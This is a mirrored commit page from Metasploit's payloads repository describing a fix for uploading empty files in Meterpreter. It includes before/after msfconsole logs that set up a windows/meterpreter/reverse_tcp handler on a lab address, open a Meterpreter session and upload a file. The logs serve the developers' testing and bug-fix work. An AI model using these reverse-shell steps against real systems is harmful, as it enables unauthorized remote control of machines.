mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-01-08 14:36:22 +01:00
6299e2de5b
Otherwise, doing an empty file open, like: ::File.open(local_file_name, "") or write_file("meterpreter-test", "") in test/modules/post/test/file.rb fails Before: ``` $ touch hello $ ./msfconsole -q msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf exploit(handler) > run [*] Started reverse handler on 192.168.56.1:4444 [*] Starting the payload handler... [*] Sending stage (787456 bytes) to 192.168.56.1 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:55621) at 2015-01-27 11:23:09 -0600 meterpreter > upload hello [-] Error running command upload: Errno::ENOENT No such file or directory @ rb_file_s_stat - hello meterpreter > upload hello [*] uploading : hello -> hello [-] core_channel_write: Operation failed: The parameter is incorrect. ``` After: ``` msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf exploit(handler) > run [*] Started reverse handler on 192.168.56.1:4444 [*] Starting the payload handler... [*] Sending stage (770048 bytes) to 192.168.56.10 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.10:49833) at 2015-01-27 11:26:03 -0600 meterpreter > upload hello [*] uploading : hello -> hello [*] uploaded : hello -> hello ``` |
||
---|---|---|
c/meterpreter |